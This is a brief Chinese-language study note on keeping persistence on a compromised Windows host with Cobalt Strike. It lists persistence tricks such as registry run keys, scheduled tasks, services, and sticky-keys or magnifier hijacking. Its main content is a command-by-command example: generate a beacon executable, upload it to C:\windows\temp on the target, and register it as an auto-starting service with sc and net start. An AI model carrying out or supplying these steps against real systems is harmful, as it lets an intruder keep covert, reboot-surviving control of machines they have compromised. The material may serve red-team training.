cs-权限维持
权限维持(windows)
可以使用注册表或者启动项,计划任务,服务,shift,放大镜功能,各种劫持或者利用各种安装的软件
实例
Attacks->Packages->Windows Executable (s)
保存下来,然后进入Beacon
cd c:\windows\temp //进入靶机c盘windows下的temp目录
upload /root/b.exe //把保存下来的脚本上传上去
shell sc create "thisserver" binpath=" c:\windows\temp\b.exe" //创建系统服务
shell sc description "thisserver" "zheshifuwu" //描述服务
shell sc config "thisserver" start= auto //设置为自动开启
shell net start "thisserver" //开启服务
==(PS:等号前不加空格,等号后面加空格)==